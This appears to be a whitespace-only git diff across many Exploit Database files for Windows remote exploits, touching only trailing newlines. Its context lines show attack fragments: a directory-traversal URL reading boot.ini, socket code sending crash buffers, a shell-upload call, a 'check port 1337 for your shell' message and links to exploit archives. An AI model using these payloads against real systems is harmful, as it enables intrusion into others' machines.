Metasploit3 < Msf::Exploit::Remote disconnect handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16802.rb b/platforms/windows/remote/16802.rb index e0199986b..b6391a291 100755 --- a/platforms/windows/remote/16802.rb +++ b/platforms/windows/remote/16802.rb @@ -64,4 +64,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16803.rb b/platforms/windows/remote/16803.rb index db93ee115..900005d90 100755 --- a/platforms/windows/remote/16803.rb +++ b/platforms/windows/remote/16803.rb @@ -133,5 +133,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16804.rb b/platforms/windows/remote/16804.rb index 59bd102f8..aa3357fc8 100755 --- a/platforms/windows/remote/16804.rb +++ b/platforms/windows/remote/16804.rb @@ -77,4 +77,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16805.rb b/platforms/windows/remote/16805.rb index 71ac7c431..682dbd5d8 100755 --- a/platforms/windows/remote/16805.rb +++ b/platforms/windows/remote/16805.rb @@ -68,4 +68,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16806.rb b/platforms/windows/remote/16806.rb index f40922b87..fb46d018d 100755 --- a/platforms/windows/remote/16806.rb +++ b/platforms/windows/remote/16806.rb @@ -95,4 +95,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16807.rb b/platforms/windows/remote/16807.rb index 7c8cdaeb0..8ae3de3fb 100755 --- a/platforms/windows/remote/16807.rb +++ b/platforms/windows/remote/16807.rb @@ -75,4 +75,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16808.rb b/platforms/windows/remote/16808.rb index ae8c6e667..05619afee 100755 --- a/platforms/windows/remote/16808.rb +++ b/platforms/windows/remote/16808.rb @@ -92,4 +92,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/1681.pm b/platforms/windows/remote/1681.pm index 39d52446f..fd920c6f5 100755 --- a/platforms/windows/remote/1681.pm +++ b/platforms/windows/remote/1681.pm @@ -124,4 +124,4 @@ sub Exploit { 1; -# milw0rm.com [2006-04-15] +# milw0rm.com [2006-04-15] \ No newline at end of file diff --git a/platforms/windows/remote/16810.rb b/platforms/windows/remote/16810.rb index 5cf062842..e061fb964 100755 --- a/platforms/windows/remote/16810.rb +++ b/platforms/windows/remote/16810.rb @@ -229,4 +229,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16811.rb b/platforms/windows/remote/16811.rb index 90b16e7ce..0f866d4f3 100755 --- a/platforms/windows/remote/16811.rb +++ b/platforms/windows/remote/16811.rb @@ -154,4 +154,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16812.rb b/platforms/windows/remote/16812.rb index 9d9c9a7e1..64109e353 100755 --- a/platforms/windows/remote/16812.rb +++ b/platforms/windows/remote/16812.rb @@ -108,4 +108,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16813.rb b/platforms/windows/remote/16813.rb index 9afa76edd..295b61add 100755 --- a/platforms/windows/remote/16813.rb +++ b/platforms/windows/remote/16813.rb @@ -77,4 +77,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16814.rb b/platforms/windows/remote/16814.rb index cfdc9c572..32f65c347 100755 --- a/platforms/windows/remote/16814.rb +++ b/platforms/windows/remote/16814.rb @@ -118,4 +118,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16815.rb b/platforms/windows/remote/16815.rb index d421e7afa..b9b3c5c76 100755 --- a/platforms/windows/remote/16815.rb +++ b/platforms/windows/remote/16815.rb @@ -90,4 +90,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16816.rb b/platforms/windows/remote/16816.rb index ae8b7264e..53722c4bf 100755 --- a/platforms/windows/remote/16816.rb +++ b/platforms/windows/remote/16816.rb @@ -117,4 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16817.rb b/platforms/windows/remote/16817.rb index e4929e55b..75b328eec 100755 --- a/platforms/windows/remote/16817.rb +++ b/platforms/windows/remote/16817.rb @@ -76,4 +76,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16818.rb b/platforms/windows/remote/16818.rb index 9f1958980..184aeab30 100755 --- a/platforms/windows/remote/16818.rb +++ b/platforms/windows/remote/16818.rb @@ -94,4 +94,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16819.rb b/platforms/windows/remote/16819.rb index 32473b98c..2d082c65d 100755 --- a/platforms/windows/remote/16819.rb +++ b/platforms/windows/remote/16819.rb @@ -69,4 +69,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16820.rb b/platforms/windows/remote/16820.rb index e03cf8457..850e034ed 100755 --- a/platforms/windows/remote/16820.rb +++ b/platforms/windows/remote/16820.rb @@ -223,4 +223,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16821.rb b/platforms/windows/remote/16821.rb index b951fe0e9..273f71044 100755 --- a/platforms/windows/remote/16821.rb +++ b/platforms/windows/remote/16821.rb @@ -80,4 +80,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16822.rb b/platforms/windows/remote/16822.rb index a390d58d6..fc3516aa4 100755 --- a/platforms/windows/remote/16822.rb +++ b/platforms/windows/remote/16822.rb @@ -86,4 +86,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16823.rb b/platforms/windows/remote/16823.rb index 05e8e7530..54b6e9b3b 100755 --- a/platforms/windows/remote/16823.rb +++ b/platforms/windows/remote/16823.rb @@ -88,4 +88,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16824.rb b/platforms/windows/remote/16824.rb index 0242fc9d4..9d63a60b0 100755 --- a/platforms/windows/remote/16824.rb +++ b/platforms/windows/remote/16824.rb @@ -76,4 +76,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16826.rb b/platforms/windows/remote/16826.rb index d02119a53..fb9ccefcf 100755 --- a/platforms/windows/remote/16826.rb +++ b/platforms/windows/remote/16826.rb @@ -93,4 +93,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16827.rb b/platforms/windows/remote/16827.rb index a23c44e85..7a7c0af7e 100755 --- a/platforms/windows/remote/16827.rb +++ b/platforms/windows/remote/16827.rb @@ -81,4 +81,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16828.rb b/platforms/windows/remote/16828.rb index fc87fcbdd..a6877d87c 100755 --- a/platforms/windows/remote/16828.rb +++ b/platforms/windows/remote/16828.rb @@ -82,4 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16829.rb b/platforms/windows/remote/16829.rb index 1754d5f5f..019cce88c 100755 --- a/platforms/windows/remote/16829.rb +++ b/platforms/windows/remote/16829.rb @@ -81,4 +81,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16830.rb b/platforms/windows/remote/16830.rb index 6c538b019..d252dfc98 100755 --- a/platforms/windows/remote/16830.rb +++ b/platforms/windows/remote/16830.rb @@ -96,4 +96,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16831.rb b/platforms/windows/remote/16831.rb index 66c572ce3..d40c80d74 100755 --- a/platforms/windows/remote/16831.rb +++ b/platforms/windows/remote/16831.rb @@ -117,4 +117,4 @@ cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 0:008> u 0x004514a9 L1 IreIKE+0x514a9: 004514a9 ffd6 call esi -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/16926.rb b/platforms/windows/remote/16926.rb index c141c1afe..92c6db15b 100755 --- a/platforms/windows/remote/16926.rb +++ b/platforms/windows/remote/16926.rb @@ -97,5 +97,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16957.rb b/platforms/windows/remote/16957.rb index 1055286d9..ab2893ca7 100755 --- a/platforms/windows/remote/16957.rb +++ b/platforms/windows/remote/16957.rb @@ -107,4 +107,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16970.rb b/platforms/windows/remote/16970.rb index c97da148b..52fe0a962 100755 --- a/platforms/windows/remote/16970.rb +++ b/platforms/windows/remote/16970.rb @@ -79,4 +79,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16984.rb b/platforms/windows/remote/16984.rb index 73aa4250b..74f1fb54b 100755 --- a/platforms/windows/remote/16984.rb +++ b/platforms/windows/remote/16984.rb @@ -119,4 +119,4 @@ this.internal.addRole("admin"); return end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/1703.pl b/platforms/windows/remote/1703.pl index 52db8b58d..8665eda40 100755 --- a/platforms/windows/remote/1703.pl +++ b/platforms/windows/remote/1703.pl @@ -240,4 +240,4 @@ main(); # END proof of concept # -# milw0rm.com [2006-04-21] +# milw0rm.com [2006-04-21] \ No newline at end of file diff --git a/platforms/windows/remote/17034.py b/platforms/windows/remote/17034.py index cd196754b..76ec1e19b 100755 --- a/platforms/windows/remote/17034.py +++ b/platforms/windows/remote/17034.py @@ -106,4 +106,4 @@ if((func==6)|(func==7)): else: print "\nNo info" -sock.close() +sock.close() \ No newline at end of file diff --git a/platforms/windows/remote/17038.rb b/platforms/windows/remote/17038.rb index 814a3f19b..998600fa4 100755 --- a/platforms/windows/remote/17038.rb +++ b/platforms/windows/remote/17038.rb @@ -99,4 +99,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17039.rb b/platforms/windows/remote/17039.rb index 5129a2024..a3d54b0d2 100755 --- a/platforms/windows/remote/17039.rb +++ b/platforms/windows/remote/17039.rb @@ -185,4 +185,4 @@ class Metasploit3 < Msf::Exploit::Remote 5 end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17040.rb b/platforms/windows/remote/17040.rb index 6b5cc6c90..b833da8a0 100755 --- a/platforms/windows/remote/17040.rb +++ b/platforms/windows/remote/17040.rb @@ -91,4 +91,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17041.rb b/platforms/windows/remote/17041.rb index fed1cd509..5c90a2926 100755 --- a/platforms/windows/remote/17041.rb +++ b/platforms/windows/remote/17041.rb @@ -179,4 +179,4 @@ class Metasploit3 < Msf::Exploit::Remote 5 end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17042.rb b/platforms/windows/remote/17042.rb index 02c14cab8..8bf4f2aff 100755 --- a/platforms/windows/remote/17042.rb +++ b/platforms/windows/remote/17042.rb @@ -91,4 +91,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17043.rb b/platforms/windows/remote/17043.rb index 79fac458b..34dca7b28 100755 --- a/platforms/windows/remote/17043.rb +++ b/platforms/windows/remote/17043.rb @@ -150,4 +150,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17044.rb b/platforms/windows/remote/17044.rb index 984b6ceda..3788cc848 100755 --- a/platforms/windows/remote/17044.rb +++ b/platforms/windows/remote/17044.rb @@ -182,4 +182,4 @@ class Metasploit3 < Msf::Exploit::Remote 5 end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17047.rb b/platforms/windows/remote/17047.rb index 1d32d0745..070ecd52f 100755 --- a/platforms/windows/remote/17047.rb +++ b/platforms/windows/remote/17047.rb @@ -90,4 +90,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17063.txt b/platforms/windows/remote/17063.txt index 6e50519e9..fb9b16052 100755 --- a/platforms/windows/remote/17063.txt +++ b/platforms/windows/remote/17063.txt @@ -145,4 +145,4 @@ def upload_shell(): print 'shell uploaded' return -upload_shell() +upload_shell() \ No newline at end of file diff --git a/platforms/windows/remote/17104.txt b/platforms/windows/remote/17104.txt index 373bf4f40..b73b6bc9b 100755 --- a/platforms/windows/remote/17104.txt +++ b/platforms/windows/remote/17104.txt @@ -349,4 +349,4 @@ binary info: POC: pocs availiable here: http://retrogod.altervista.org/9sg_realgames_i.html - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17104.zip (9sg_StubbyUtil.ShellCtl.1.zip) + https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17104.zip (9sg_StubbyUtil.ShellCtl.1.zip) \ No newline at end of file diff --git a/platforms/windows/remote/17149.rb b/platforms/windows/remote/17149.rb index 3996d1915..4ef676ed9 100755 --- a/platforms/windows/remote/17149.rb +++ b/platforms/windows/remote/17149.rb @@ -114,4 +114,4 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, html, { 'Content-Type' => 'text/html' }) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17151.rb b/platforms/windows/remote/17151.rb index 4a8366e73..3c25d4f49 100755 --- a/platforms/windows/remote/17151.rb +++ b/platforms/windows/remote/17151.rb @@ -323,4 +323,4 @@ Badchars: 0x10=0x0f30, 0x11=0x0f31, 0x12=0x0f32, 0x13=0x0f33, 0x14=0x0f34, 0x15=0x0f35, 0x16=0x0f36, 0x17=0x0f37, 0x18=0x0f38, 0x1a=0x0f3a, 0x1b=0x0f3b, 0x1c=0x0f3c, 0x1d=0x0f3d, 0x1e=0x0f3e, 0x1f=0x0f3f, 0x2c=nocrash, 0x80..0xff = "" -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/17155.py b/platforms/windows/remote/17155.py index e07a95f3b..90a7c089f 100755 --- a/platforms/windows/remote/17155.py +++ b/platforms/windows/remote/17155.py @@ -86,4 +86,4 @@ def main(): print "[+] Finished." if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/platforms/windows/remote/17156.txt b/platforms/windows/remote/17156.txt index 7b9ad3468..335ccccf8 100755 --- a/platforms/windows/remote/17156.txt +++ b/platforms/windows/remote/17156.txt @@ -84,4 +84,4 @@ and hit Ok again, and it will look normal again and work. It's just something to check if it isn't working on your test machine. A complete write-up on how this particular exploit works can be viewed -at www.k0ss.net +at www.k0ss.net \ No newline at end of file diff --git a/platforms/windows/remote/17195.rb b/platforms/windows/remote/17195.rb index 527f70ef9..a1210f759 100755 --- a/platforms/windows/remote/17195.rb +++ b/platforms/windows/remote/17195.rb @@ -180,4 +180,4 @@ class Metasploit3 < Msf::Exploit::Remote close_pcap end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17219.rb b/platforms/windows/remote/17219.rb index 3e8b380ca..b401079f7 100755 --- a/platforms/windows/remote/17219.rb +++ b/platforms/windows/remote/17219.rb @@ -158,4 +158,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17252.rb b/platforms/windows/remote/17252.rb index 7749048bd..64555f76d 100755 --- a/platforms/windows/remote/17252.rb +++ b/platforms/windows/remote/17252.rb @@ -317,4 +317,4 @@ EOS rvas['BaseAddress'] + rvas[key] end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17268.rb b/platforms/windows/remote/17268.rb index 695c22157..f477b869b 100755 --- a/platforms/windows/remote/17268.rb +++ b/platforms/windows/remote/17268.rb @@ -116,4 +116,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17269.rb b/platforms/windows/remote/17269.rb index 19ba25d08..56c110b1c 100755 --- a/platforms/windows/remote/17269.rb +++ b/platforms/windows/remote/17269.rb @@ -222,4 +222,4 @@ class Metasploit3 < Msf::Exploit::Remote send_response(cli, html, {'Content-Type'=>'text/html'}) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17300.rb b/platforms/windows/remote/17300.rb index a2b9567b3..f94503692 100755 --- a/platforms/windows/remote/17300.rb +++ b/platforms/windows/remote/17300.rb @@ -164,4 +164,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17304.txt b/platforms/windows/remote/17304.txt index 76bc17e13..e17c1cfcb 100755 --- a/platforms/windows/remote/17304.txt +++ b/platforms/windows/remote/17304.txt @@ -128,5 +128,4 @@ The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf Other Sense of Security advisories can be found at: -http://www.senseofsecurity.com.au/research/it-security-advisories.php - +http://www.senseofsecurity.com.au/research/it-security-advisories.php \ No newline at end of file diff --git a/platforms/windows/remote/17328.html b/platforms/windows/remote/17328.html index 6eb22bd50..4a83b7c0c 100755 --- a/platforms/windows/remote/17328.html +++ b/platforms/windows/remote/17328.html @@ -51,4 +51,4 @@ Function ICMPSendEchoRequest ( # Exploit-DB Note: # According to MagnetSoft The exploit has been fixed in the latest version of the software,5.0.0.1. # The latest version that contains the fix can be downloaded here: -# http://www.magnetosoft.com/www/downloads/win32/skdns_setup.exe +# http://www.magnetosoft.com/www/downloads/win32/skdns_setup.exe \ No newline at end of file diff --git a/platforms/windows/remote/17339.py b/platforms/windows/remote/17339.py index 970a4ed4c..7137918f5 100755 --- a/platforms/windows/remote/17339.py +++ b/platforms/windows/remote/17339.py @@ -48,4 +48,4 @@ while 1: else: break -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/17345.py b/platforms/windows/remote/17345.py index 36beb73fa..273120bd0 100755 --- a/platforms/windows/remote/17345.py +++ b/platforms/windows/remote/17345.py @@ -108,4 +108,4 @@ ACK=TCP(sport=31337, dport=5555, flags="A", seq=1, ack=my_ack) send(ip/ACK) PUSH=TCP(sport=31337, dport=5555, flags="PA", seq=1, ack=my_ack) -send(ip/PUSH/payload) +send(ip/PUSH/payload) \ No newline at end of file diff --git a/platforms/windows/remote/17352.rb b/platforms/windows/remote/17352.rb index b768b583f..b577011bc 100755 --- a/platforms/windows/remote/17352.rb +++ b/platforms/windows/remote/17352.rb @@ -173,4 +173,4 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17359.pl b/platforms/windows/remote/17359.pl index 66fa74810..861f490df 100755 --- a/platforms/windows/remote/17359.pl +++ b/platforms/windows/remote/17359.pl @@ -142,4 +142,4 @@ if ($socket = IO::Socket::INET->new else { print "[-] Connection to $target failed!\n"; - } + } \ No newline at end of file diff --git a/platforms/windows/remote/17361.py b/platforms/windows/remote/17361.py index a494994d3..446ca3463 100755 --- a/platforms/windows/remote/17361.py +++ b/platforms/windows/remote/17361.py @@ -114,5 +114,4 @@ s.send(header) time.sleep(1) s.close() -print "[+] Check port 1337 for your shell" - +print "[+] Check port 1337 for your shell" \ No newline at end of file diff --git a/platforms/windows/remote/17365.py b/platforms/windows/remote/17365.py index 069c86ab2..845dcd766 100755 --- a/platforms/windows/remote/17365.py +++ b/platforms/windows/remote/17365.py @@ -86,4 +86,4 @@ hdrs={"Host":"pw.n","Content-Length":size,"Authorization":"Basic dGl2b2xpOmJvc3M conn=httplib.HTTPConnection(target,port) conn.request("POST","/addr",data,hdrs) -conn.close() +conn.close() \ No newline at end of file diff --git a/platforms/windows/remote/17373.py b/platforms/windows/remote/17373.py index 4230880e1..60a0f07ad 100755 --- a/platforms/windows/remote/17373.py +++ b/platforms/windows/remote/17373.py @@ -106,4 +106,4 @@ print (s.recv(1024)) s.send('PASS b33f\r\n') print (s.recv(1024)) s.send('RETR ' + buffer + '\r\n') -s.close +s.close \ No newline at end of file diff --git a/platforms/windows/remote/17374.rb b/platforms/windows/remote/17374.rb index 8e30f0142..b5090ef99 100755 --- a/platforms/windows/remote/17374.rb +++ b/platforms/windows/remote/17374.rb @@ -322,4 +322,4 @@ class Metasploit3 < Msf::Exploit::Remote sploit_rename(id) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17381.txt b/platforms/windows/remote/17381.txt index 31e3343be..1c1e8491d 100755 --- a/platforms/windows/remote/17381.txt +++ b/platforms/windows/remote/17381.txt @@ -20,4 +20,4 @@ exploited to read files outside of the web root. --PoC-- -http://localhost/%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../boot.ini +http://localhost/%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../boot.ini \ No newline at end of file diff --git a/platforms/windows/remote/17409.rb b/platforms/windows/remote/17409.rb index 20c920b7c..570010ba0 100755 --- a/platforms/windows/remote/17409.rb +++ b/platforms/windows/remote/17409.rb @@ -311,4 +311,4 @@ class Metasploit3 < Msf::Exploit::Remote send_response(cli, html, {'Content-Type'=>'text/html'}) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17417.rb b/platforms/windows/remote/17417.rb index bd475ee19..7d570f24a 100755 --- a/platforms/windows/remote/17417.rb +++ b/platforms/windows/remote/17417.rb @@ -105,4 +105,4 @@ FlexMLang!GetFlexMLangIResourceBrowser+0x2b991: 4002da21 5e pop esi 4002da22 5b pop ebx 4002da23 c3 ret -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/17419.zip b/platforms/windows/remote/17419.zip index 96c46895f..8866273c0 100755 --- a/platforms/windows/remote/17419.zip +++ b/platforms/windows/remote/17419.zip @@ -23,4 +23,4 @@ Win7 Version: https://github.com/offensive-security/exploit-database-bin-sploits -questions / comments : Info [at] abysssec.com +questions / comments : Info [at] abysssec.com \ No newline at end of file diff --git a/platforms/windows/remote/17424.rb b/platforms/windows/remote/17424.rb index a4417019a..34b9cd6aa 100755 --- a/platforms/windows/remote/17424.rb +++ b/platforms/windows/remote/17424.rb @@ -146,4 +146,4 @@ class Metasploit3 < Msf::Exploit::Remote super end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17429.rb b/platforms/windows/remote/17429.rb index 2a25c2084..f411e86ca 100755 --- a/platforms/windows/remote/17429.rb +++ b/platforms/windows/remote/17429.rb @@ -98,4 +98,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17430.rb b/platforms/windows/remote/17430.rb index d9c64d791..48ca83655 100755 --- a/platforms/windows/remote/17430.rb +++ b/platforms/windows/remote/17430.rb @@ -75,4 +75,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17434.rb b/platforms/windows/remote/17434.rb index 2c1b0db67..257daad14 100755 --- a/platforms/windows/remote/17434.rb +++ b/platforms/windows/remote/17434.rb @@ -87,4 +87,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17448.rb b/platforms/windows/remote/17448.rb index b9e1d7151..67b1a64a9 100755 --- a/platforms/windows/remote/17448.rb +++ b/platforms/windows/remote/17448.rb @@ -169,4 +169,4 @@ class Metasploit3 < Msf::Exploit::Remote select(nil,nil,nil,1) end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17456.rb b/platforms/windows/remote/17456.rb index bb48773b5..74b27eceb 100755 --- a/platforms/windows/remote/17456.rb +++ b/platforms/windows/remote/17456.rb @@ -93,4 +93,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17467.rb b/platforms/windows/remote/17467.rb index fbecde3f4..bd706fe74 100755 --- a/platforms/windows/remote/17467.rb +++ b/platforms/windows/remote/17467.rb @@ -130,4 +130,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17468.py b/platforms/windows/remote/17468.py index 78cf13c80..4800f4fbc 100755 --- a/platforms/windows/remote/17468.py +++ b/platforms/windows/remote/17468.py @@ -106,4 +106,4 @@ packet +=("\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00" sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect((target, 5555)) sock.send(packet) -sock.close() +sock.close() \ No newline at end of file diff --git a/platforms/windows/remote/17490.rb b/platforms/windows/remote/17490.rb index a8daa642a..cee19b7ad 100755 --- a/platforms/windows/remote/17490.rb +++ b/platforms/windows/remote/17490.rb @@ -169,4 +169,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17498.rb b/platforms/windows/remote/17498.rb index 90b73aa5a..19d4604af 100755 --- a/platforms/windows/remote/17498.rb +++ b/platforms/windows/remote/17498.rb @@ -60,4 +60,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/175.pl b/platforms/windows/remote/175.pl index 4712897a0..4e93b7ede 100755 --- a/platforms/windows/remote/175.pl +++ b/platforms/windows/remote/175.pl @@ -240,4 +240,4 @@ print " done\r\n"; # EOF -# milw0rm.com [2004-04-12] +# milw0rm.com [2004-04-12] \ No newline at end of file diff --git a/platforms/windows/remote/17513.rb b/platforms/windows/remote/17513.rb index 9a769d36a..e77204b0a 100755 --- a/platforms/windows/remote/17513.rb +++ b/platforms/windows/remote/17513.rb @@ -139,4 +139,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17520.rb b/platforms/windows/remote/17520.rb index f5d674d9c..b5b02432a 100755 --- a/platforms/windows/remote/17520.rb +++ b/platforms/windows/remote/17520.rb @@ -367,4 +367,4 @@ final call looks like this: CALL [[[[ESI]+8]]+70] 104924DB |.^ 75 E4 \JNZ SHORT xul.104924C1 104924DD |. 5E POP ESI 104924DE \. C2 0400 RETN 4 -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/17527.py b/platforms/windows/remote/17527.py index c227575a8..b08144daa 100755 --- a/platforms/windows/remote/17527.py +++ b/platforms/windows/remote/17527.py @@ -82,6 +82,4 @@ s.send("USER test\r\n") s.recv(1024) s.send("PASS test\r\n") s.recv(1024) -s.send("PASV " + crash + "\r\n") - - +s.send("PASV " + crash + "\r\n") \ No newline at end of file diff --git a/platforms/windows/remote/17537.rb b/platforms/windows/remote/17537.rb index 6c38ad1ea..55c9e1df8 100755 --- a/platforms/windows/remote/17537.rb +++ b/platforms/windows/remote/17537.rb @@ -162,4 +162,4 @@ NNM 7.53_01195's badchar set: 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 7f ............... 3b = delimiter 2b = gets converted to 0x2b -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/17540.rb b/platforms/windows/remote/17540.rb index b938ab2d2..1f89a12df 100755 --- a/platforms/windows/remote/17540.rb +++ b/platforms/windows/remote/17540.rb @@ -62,4 +62,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17543.rb b/platforms/windows/remote/17543.rb index 2b17d9882..f1d41012b 100755 --- a/platforms/windows/remote/17543.rb +++ b/platforms/windows/remote/17543.rb @@ -348,4 +348,4 @@ db 0x00 end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17557.html b/platforms/windows/remote/17557.html index afe902621..80e016a99 100755 --- a/platforms/windows/remote/17557.html +++ b/platforms/windows/remote/17557.html @@ -93,4 +93,4 @@ document.write(x + "
"); url+= "&SV=" + escape(x); document.location= url; - + \ No newline at end of file diff --git a/platforms/windows/remote/17575.txt b/platforms/windows/remote/17575.txt index aef27978f..c2c7da811 100755 --- a/platforms/windows/remote/17575.txt +++ b/platforms/windows/remote/17575.txt @@ -23,4 +23,4 @@ CVEs listed in APPLE-SA-2011-07-20-1. and follow @abysssec for updates http://www.abysssec.com/files/CVE-2011-0222_WinXP_Exploit.zip - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17575.zip (CVE-2011-0222_WinXP_Exploit.zip) + https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17575.zip (CVE-2011-0222_WinXP_Exploit.zip) \ No newline at end of file diff --git a/platforms/windows/remote/17578.txt b/platforms/windows/remote/17578.txt index 37866fa28..0f84f0428 100755 --- a/platforms/windows/remote/17578.txt +++ b/platforms/windows/remote/17578.txt @@ -10,5 +10,4 @@ (Directory browsing = Off) http://localhost:8080/.../file.php (html) # Source 